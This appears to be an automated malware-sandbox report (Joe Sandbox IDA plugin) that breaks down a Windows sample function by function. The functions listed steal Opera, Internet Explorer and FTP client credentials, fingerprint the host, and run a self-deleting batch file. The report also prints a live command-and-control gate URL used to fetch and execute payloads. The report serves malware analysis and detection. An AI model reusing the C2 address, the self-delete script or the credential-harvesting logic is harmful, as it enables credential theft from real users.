Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
String ID: *.*$.ini$Sites\$\*.*
API String ID: 3040542784-999409347
Opcode ID: e1b3541782865d086890281bc8e6355eb265398b6da5a4db2899a02257b019a5
Instruction ID: 946114e3cbcb973e76e8ccb1141be432eb652bac24e3449ea367a70d700628f9
Opcode Fuzzy Hash: e1b3541782865d086890281bc8e6355eb265398b6da5a4db2899a02257b019a5
Instruction Fuzzy Hash: 3A3150B0510219BADF11BF21CC02BEEB7A9AF80344F1041B7BA08B51E1DB799ED19F58

Uniqueness

Uniqueness Score: -1.00%

Function 00404567 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 139
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExA.KERNEL32(0000009C), ref: 004045B0
GetLocaleInfoA.KERNEL32(00000400,00001002,?,000003FF,00000400,?,00000000,?,00000000,00000000,0000009C), ref: 00404635
GetLocaleInfoA.KERNEL32(00000400,00001001,?,000003FF,?,?,00000000,00000400,00001002,?,000003FF,00000400,?,00000000,?,00000000), ref: 0040465E
GetModuleHandleA.KERNEL32(kernel32.dll,?,00000000,?,00000000,00000000,HWID,?,?,00000000,?,?,00000000,00000400,00001001,?), ref: 00404713
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404732
GetNativeSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll,?,00000000,?,00000000,00000000,HWID,?,?,00000000,?,?,00000000), ref: 00404742
GetSystemInfo.KERNEL32(?,kernel32.dll,?,00000000,?,00000000,00000000,HWID,?,?,00000000,?,?,00000000,00000400,00001001), ref: 00404750

Strings

kernel32.dll, xrefs: 0040470E
HWID, xrefs: 0040468C
GetNativeSystemInfo, xrefs: 00404727

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: Info$LocaleSystem$AddressHandleModuleNativeProcVersion
String ID: GetNativeSystemInfo$HWID$kernel32.dll
API String ID: 1787888500-92997708
Opcode ID: c03fc7fa8ed8e8c039f72d055e181a59c8cda34764d1350e271c86cedc51e686
Instruction ID: f2dbb714d3b0804c937ff92670f5e205ceb4c9ab90b9c94e6585d74bee2b7241
Opcode Fuzzy Hash: c03fc7fa8ed8e8c039f72d055e181a59c8cda34764d1350e271c86cedc51e686
Instruction Fuzzy Hash: 41518371A00218BEDF21BB61CC46F9D7A35AF82304F0040BAB749790E1DBB94AD19F1A

Uniqueness

Uniqueness Score: -1.00%

Function 00408A4F Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 77filestringCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,?,0000013E,?,\*.*), ref: 00408AA4
lstrcmpiA.KERNEL32(00414FB7,?), ref: 00408AD7
lstrcmpiA.KERNEL32(00414FB9,?), ref: 00408AF1
StrStrIA.SHLWAPI(?,opera,00000000,00000000,?,?,00414878,00414FB9,?,00414FB7,?,00000000,?,?,0000013E,?), ref: 00408B36
FindNextFileA.KERNEL32(?,?,00000000,?,?,0000013E,?,\*.*), ref: 00408B64
FindClose.KERNEL32(?,?,?,00000000,?,?,0000013E,?,\*.*), ref: 00408B77

Strings

wand.dat, xrefs: 00408B3F
\*.*, xrefs: 00408A73
opera, xrefs: 00408B2B

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: Find$Filelstrcmpi$CloseFirstNext
String ID: \*.*$opera$wand.dat
API String ID: 3663067366-3278183560
Opcode ID: 9862ff7f52af266a39a022fdbc21e4fcba6df7798ef041eab8f4f468ca276024
Instruction ID: 7cc82b31b5a83ab5f52fe7b5ce05e30b79ae97800c24b695cfe0815147d7e53b
Opcode Fuzzy Hash: 9862ff7f52af266a39a022fdbc21e4fcba6df7798ef041eab8f4f468ca276024
Instruction Fuzzy Hash: D3312F70900219AADF20AB61CD02BEEB7B5AB44344F5044FBB448B51E1DB789FC0DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404110 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 117filestringCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,?,0000013E,?,*.*,?), ref: 00404180
lstrcmpiA.KERNEL32(00414FB7,?), ref: 004041AD
lstrcmpiA.KERNEL32(00414FB9,?), ref: 004041CA
FindNextFileA.KERNEL32(?,?,?,00000000,00000000,?,?,0000013E,?,*.*,?), ref: 00404294
FindClose.KERNEL32(?,?,?,?,00000000,00000000,?,?,0000013E,?,*.*,?), ref: 004042A7

Part of subcall function 00401D80: lstrlen.KERNEL32(?,?,?,0040210A,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00414878,004103E4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401DA1
Part of subcall function 00401D80: lstrlen.KERNEL32(?,?,?,?,0040210A,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00414878,004103E4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401DAB
Part of subcall function 00401D80: lstrcpy.KERNEL32(00000000,?), ref: 00401DBF
Part of subcall function 00401D80: lstrcat.KERNEL32(00000000,?), ref: 00401DC8

Strings

\*.*, xrefs: 00404140
*.*, xrefs: 0040414F

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
String ID: *.*$\*.*
API String ID: 3040542784-1692270452
Opcode ID: 1668a86da0a11c543266ea31b0932b1fd5df1935911e266c40dfb37622084168
Instruction ID: 71dc150577332a6ea9f4f0efe233f703b564e9a29810bed22a524e1ca9e1537f
Opcode Fuzzy Hash: 1668a86da0a11c543266ea31b0932b1fd5df1935911e266c40dfb37622084168
Instruction Fuzzy Hash: 14417470500209BADF11AF61CC06AEE7B69AF90384F1041BBFA08B41F1D7799ED19F59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A67C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 116stringencryptionCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 0040A686
wsprintfA.USER32 ref: 0040A705
lstrlenW.KERNEL32(?,Software\Microsoft\Internet Explorer\IntelliForms\Storage2,?,?,?,?,?,?), ref: 0040A74B
CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040A78E
LocalFree.KERNEL32(00000000,?,?), ref: 0040A7C5

Strings

Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 0040A723
%02X, xrefs: 0040A6CC, 0040A6FC

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: lstrlen$CryptDataFreeLocalUnprotectwsprintf
String ID: %02X$Software\Microsoft\Internet Explorer\IntelliForms\Storage2
API String ID: 1926481713-2450551051
Opcode ID: 9c20aadd822a88e2c3e6f41c20adc5fa6ae772e8f4377b017dac4be71d12314f
Instruction ID: 8af7b36c123668128c606e2ab033df41cbf4071d0a43d7b9cf8741f2e00074fa
Opcode Fuzzy Hash: 9c20aadd822a88e2c3e6f41c20adc5fa6ae772e8f4377b017dac4be71d12314f
Instruction Fuzzy Hash: 8F41597281021CEBDF11EFA1DC05AEEBB7AEF04314F04803AF910B51A1D7B99A61DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040514D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81filestringCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,?,0000013E,?,\*.*,00000000,?,?), ref: 004051BC
lstrcmpiA.KERNEL32(00414FB7,?), ref: 004051EB
lstrcmpiA.KERNEL32(00414FB9,?), ref: 00405205
FindNextFileA.KERNEL32(?,?,00000000,?,?,0000013E,?,\*.*,00000000,?,?), ref: 0040525D
FindClose.KERNEL32(?,?,?,00000000,?,?,0000013E,?,\*.*,00000000,?,?), ref: 00405270

Strings

\*.*, xrefs: 0040518B

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: Find$Filelstrcmpi$CloseFirstNext
String ID: \*.*
API String ID: 3663067366-1173974218
Opcode ID: 17d0ebb5889fccea655d6d39ac1bc36bc9954570420f56ba0753fdc985178715
Instruction ID: 52128acd16f511aaf3689c78e3949de5d3f3961e8f9d712b313535cbdc7ab976
Opcode Fuzzy Hash: 17d0ebb5889fccea655d6d39ac1bc36bc9954570420f56ba0753fdc985178715
Instruction Fuzzy Hash: 2231FC71900219AADF21AB61CC02BEE77B9EF00348F5045AAB808B51A1DB799ED09F58

Uniqueness

Uniqueness Score: -1.00%

Function 004028F0 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 0040292B
GetCurrentProcess.KERNEL32 ref: 00402935
OpenProcessToken.ADVAPI32(00000000,00000020,00000000), ref: 00402943
AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,00000000,00000000), ref: 00402985
CloseHandle.KERNEL32(00000000), ref: 00402999

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 3038321057-0
Opcode ID: 6cd35e1ec0b8568d459acc08a740fee80c8e80c65011669c67074823fc3bbed9
Instruction ID: 752786acf4088748a6f16755c620852e1f65e3ce455aca53885acb762e6531be
Opcode Fuzzy Hash: 6cd35e1ec0b8568d459acc08a740fee80c8e80c65011669c67074823fc3bbed9
Instruction Fuzzy Hash: 60116D71A04208EBEB119FA4DD4DBEEBBB5FB40319F108036A151B51E0D7F89A84CF18

Uniqueness

Uniqueness Score: -1.00%

Function 00410365 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00410371
GetUserNameA.ADVAPI32(00000101,00000101), ref: 004103C1

Strings

het2563783920299393, xrefs: 004103E9

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: InitializeNameUser
String ID: het2563783920299393
API String ID: 2272643758-2945140937
Opcode ID: 1623c35c32e608347af548d751fc151d36db7e749d737152979c8a145b01a264
Instruction ID: 8b1f34e50527271bfedb7881bb8bfe892eb4f1fdf18e706de9c14e32afef3f22
Opcode Fuzzy Hash: 1623c35c32e608347af548d751fc151d36db7e749d737152979c8a145b01a264
Instruction Fuzzy Hash: 99F044705142086EDB107BA3AD077D936A45B4034CF50803FB824E51E2DEFD5580D66D

Uniqueness

Uniqueness Score: -1.00%

Function 0040443C Relevance: 4.6, APIs: 3, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0040449B
CheckTokenMembership.KERNELBASE(00000000,?,00000000), ref: 004044B7
FreeSid.ADVAPI32(?), ref: 004044CB

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: ea0b4cd33dcb887dcbcb3c3d5d700a9ced92f42c5d5974ed7f83f7deb8a77e10
Instruction ID: 59c9fe2139827fc3dbe319486bddf3b4a80d281f4546e2cb44af971f627c1ef3
Opcode Fuzzy Hash: ea0b4cd33dcb887dcbcb3c3d5d700a9ced92f42c5d5974ed7f83f7deb8a77e10
Instruction Fuzzy Hash: 7B1148B0904248DEEF11CB94DC4DBDA7BF4AB55308F0581A5D114AA2E1D3F9D508CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040245E Relevance: 3.0, APIs: 2, Instructions: 47libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00414B2E,?,?,?,?,004024C7,ole32.dll,00414B2E,0041037B), ref: 00402467
GetProcAddress.KERNEL32(00000000,00414B2E), ref: 00402495

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 182901e3aac0acb518893847d7cc03d78d3ef11046aa55f447fac592f991a4b6
Instruction ID: 5755110d68d0671c78c9020215ced64c70a73d535768fdcf64a7a9712953a9c7
Opcode Fuzzy Hash: 182901e3aac0acb518893847d7cc03d78d3ef11046aa55f447fac592f991a4b6
Instruction Fuzzy Hash: 05F0B4333040052AD7106A39AD8499F6F88E7E3378B105137F945A72C1E1FDDD81C3A4

Uniqueness

Uniqueness Score: -1.00%

Function 0040FEE0 Relevance: 38.7, APIs: 16, Strings: 6, Instructions: 156
stringfilelibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00401857: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BFC,00000000), ref: 00401865

GetTickCount.KERNEL32 ref: 0040FF03
wsprintfA.USER32 ref: 0040FF11
GetModuleFileNameA.KERNEL32(?,00000104,00000105,00000105,00000105,?,?,00000105), ref: 0040FF71
GetTempPathA.KERNEL32(00000104,?,?,00000104,00000105,00000105,00000105,?,?,00000105), ref: 0040FF87
lstrcat.KERNEL32(?,?), ref: 0040FF9B
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,?,00000104,00000105,00000105,00000105), ref: 0040FFB4
lstrcpy.KERNEL32(?,?), ref: 0040FFCB
StrRChrIA.SHLWAPI(?,00000000,0000005C,?,?,?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,?,00000104), ref: 0040FFD7
lstrcpy.KERNEL32(00000001,?), ref: 0040FFE5
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,0000005C,?,?,?,C0000000,00000003,00000000), ref: 0040FFFC
lstrlen.KERNEL32( :ktk del %1 if exist %1 goto ktk del %0 ,?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,?,00000104,00000105,00000105,00000105), ref: 0041000C
CloseHandle.KERNEL32(?,00000000,?, :ktk del %1 if exist %1 goto ktk del %0 ,00000000, :ktk del %1 if exist %1 goto ktk del %0 ,?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,?), ref: 00410023
wsprintfA.USER32 ref: 0041003A
LoadLibraryA.KERNEL32(shell32.dll,00000105,00000105,00000105,?,?,00000105), ref: 00410047
GetProcAddress.KERNEL32(00000000,ShellExecuteA), ref: 00410056
ShellExecuteA.SHELL32(00000000,open,?,?,00000000,00000000,00000000,ShellExecuteA,shell32.dll,00000105,00000105,00000105,?,?,00000105), ref: 00410070

Strings

:ktk del %1 if exist %1 goto ktk del %0 , xrefs: 00410007, 00410012
%d.bat, xrefs: 0040FF09
open, xrefs: 00410069
shell32.dll, xrefs: 00410042
"%s" , xrefs: 00410032
ShellExecuteA, xrefs: 00410050

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: File$Createlstrcpywsprintf$AddressAllocCloseCountExecuteHandleLibraryLoadLocalModuleNamePathProcShellTempTicklstrcatlstrlen
String ID: :ktk del %1 if exist %1 goto ktk del %0 $ "%s" $%d.bat$ShellExecuteA$open$shell32.dll
API String ID: 2116904195-4169620016
Opcode ID: 6f4908035ec8cb4b628ec564ede86aefcf7037eddad4daabd9cbdfa083509d3c
Instruction ID: de26498704618d1656750a5e168cfd676922b365631f1691106e9a1bfd73c9ad
Opcode Fuzzy Hash: 6f4908035ec8cb4b628ec564ede86aefcf7037eddad4daabd9cbdfa083509d3c
Instruction Fuzzy Hash: 67414230B442057BDF2876A69C02FEF7A67AB84704F20903E7215F62E1DEB95DD05A1C

Uniqueness

Uniqueness Score: -1.00%

Function 0040590E Relevance: 36.8, APIs: 3, Strings: 18, Instructions: 76
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 004059AE
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004059DE
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405A2C

Strings

Remote Dir, xrefs: 00405921
Server.User, xrefs: 00405959
User, xrefs: 0040592B
Last Server Path, xrefs: 0040597D
Last Server Port, xrefs: 00405982
Last Server Type, xrefs: 00405978
Server.Port, xrefs: 00405954
Pass, xrefs: 00405935
Server Type, xrefs: 0040591C
Server.Pass, xrefs: 00405963
Port, xrefs: 00405926
Server.Host, xrefs: 0040595E
Last Server Pass, xrefs: 00405991
Last Server Host, xrefs: 0040598C
ServerType, xrefs: 0040594A
Path, xrefs: 0040594F
Last Server User, xrefs: 00405987
Host, xrefs: 00405930

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: Host$Last Server Host$Last Server Pass$Last Server Path$Last Server Port$Last Server Type$Last Server User$Pass$Path$Port$Remote Dir$Server Type$Server.Host$Server.Pass$Server.Port$Server.User$ServerType$User
API String ID: 1332880857-44262141
Opcode ID: 70bd939766c9f760e92b821c939c84b187204c1e43a864424d0a4a74b6b24a4e
Instruction ID: 3749a9db32c4b1563b841dd80bd055b533a48c519498eb5124c5c046765c62ea
Opcode Fuzzy Hash: 70bd939766c9f760e92b821c939c84b187204c1e43a864424d0a4a74b6b24a4e
Instruction Fuzzy Hash: 76213D34680A0CFADB11AA51CD03FDE7A6AAB84B05F20C063B505750E1DABD5AD0AF4C

Uniqueness

Uniqueness Score: -1.00%

Function 00402041 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 172
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004103E4), ref: 004020AE
RegEnumKeyExA.ADVAPI32(004103E4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 004020EE
lstrlen.KERNEL32(?,00000000,00000000,80000002,?,DisplayName,?,?,00000000,?,00000000,80000002,?,UninstallString,?,00000000), ref: 004021A1
lstrlen.KERNEL32(?,80000002,?,DisplayName,?,?,00000000,?,00000000,80000002,?,UninstallString,?,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall), ref: 004021DA

Part of subcall function 00401840: LocalFree.KERNEL32(00000000,?,00402C4E), ref: 0040184C

RegCloseKey.ADVAPI32(004103E4,004103E4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00402211
756D19A0.OLE32(?,?,?,00000000,?,00000000,?,?,?,?,?,004103E4), ref: 0040223D
GlobalFix.KERNEL32(?), ref: 0040226D
GlobalUnWire.KERNEL32(?), ref: 0040228C
756D19A0.OLE32(?,?,?,?,?,00000000,?,00000000,?,?,?,?,?,004103E4), ref: 0040229E
GlobalFix.KERNEL32(?), ref: 004022CE
GlobalUnWire.KERNEL32(?), ref: 004022ED

Part of subcall function 00401857: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BFC,00000000), ref: 00401865

Strings

DisplayName, xrefs: 00402176
UninstallString, xrefs: 00402136
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 004020A4, 00402100

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: Global$LocalWirelstrlen$AllocCloseEnumFreeOpen
String ID: DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
API String ID: 3331298335-981893429
Opcode ID: 638be5dfb57a565d336b185d0523d82be2957367dfd3ec9eefcae292eeba3a90
Instruction ID: 08dd40a3e5dae8a0bad9d8a75200fccf60eadea40099cdf2be1d799f06a1f1c2
Opcode Fuzzy Hash: 638be5dfb57a565d336b185d0523d82be2957367dfd3ec9eefcae292eeba3a90
Instruction Fuzzy Hash: E9614F718001A8BADF31BB61CD05BEA7679AB44345F0040FAB688B11E1D7BD5EC4EE68

Uniqueness

Uniqueness Score: -1.00%

Function 0040FCF4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 126
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00401710: 756D19A0.OLE32(?,?), ref: 0040171D
Part of subcall function 00401710: GlobalFix.KERNEL32(?), ref: 00401734
Part of subcall function 00401710: GlobalUnWire.KERNEL32(?), ref: 0040174C

wsprintfA.USER32 ref: 0040FD65
GetTempPathA.KERNEL32(00000104,?,?,00000000,00000002), ref: 0040FDD8
GetTickCount.KERNEL32 ref: 0040FDF0
wsprintfA.USER32 ref: 0040FE02
CreateDirectoryA.KERNEL32(?,00000000), ref: 0040FE13
lstrlen.KERNEL32(true,?,?,?,?,?,?,00000000), ref: 0040FE7B
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0040FEA4

Part of subcall function 00401D80: lstrlen.KERNEL32(?,?,?,0040210A,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00414878,004103E4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401DA1
Part of subcall function 00401D80: lstrlen.KERNEL32(?,?,?,?,0040210A,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00414878,004103E4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401DAB
Part of subcall function 00401D80: lstrcpy.KERNEL32(00000000,?), ref: 00401DBF
Part of subcall function 00401D80: lstrcat.KERNEL32(00000000,?), ref: 00401DC8

Strings

%02X, xrefs: 0040FD59
true, xrefs: 0040FE76, 0040FE81
open, xrefs: 0040FE9D
%d.exe, xrefs: 0040FDF6
http://assuredexpresscourierservice.com/ponzy/Panelnew/gate.php, xrefs: 0040FD03, 0040FD18

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: lstrlen$Globalwsprintf$CountCreateDirectoryExecutePathShellTempTickWirelstrcatlstrcpy
String ID: %02X$%d.exe$http://assuredexpresscourierservice.com/ponzy/Panelnew/gate.php$open$true
API String ID: 2046336982-2314549783
Opcode ID: 941e83e344cc6860ffb520b6e94969517b22a403d0126689117f68caba4614b3
Instruction ID: 3c039ec134d7ce4010dbf872b881317b3fd1ac2be2cbd8dee052789ab6ffcd6a
Opcode Fuzzy Hash: 941e83e344cc6860ffb520b6e94969517b22a403d0126689117f68caba4614b3
Instruction Fuzzy Hash: 04414171900228AADB30AB61CC46FEEB7789B45705F1005F7B648B11E2DBBC5EC48F98

Uniqueness

Uniqueness Score: -1.00%

Function 00402B7F Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 77
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00402BAC
OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 00402BB8
GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00402BDA
GetLastError.KERNEL32 ref: 00402BE4
GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000000,00000000,00000000), ref: 00402C0E
ConvertSidToStringSidA.ADVAPI32(?,?), ref: 00402C22
lstrcmp.KERNEL32(?,S-1-5-18), ref: 00402C34
LocalFree.KERNEL32(?,?,?), ref: 00402C41
CloseHandle.KERNEL32(?), ref: 00402C51

Strings

S-1-5-18, xrefs: 00402C2C

Memory Dump Source

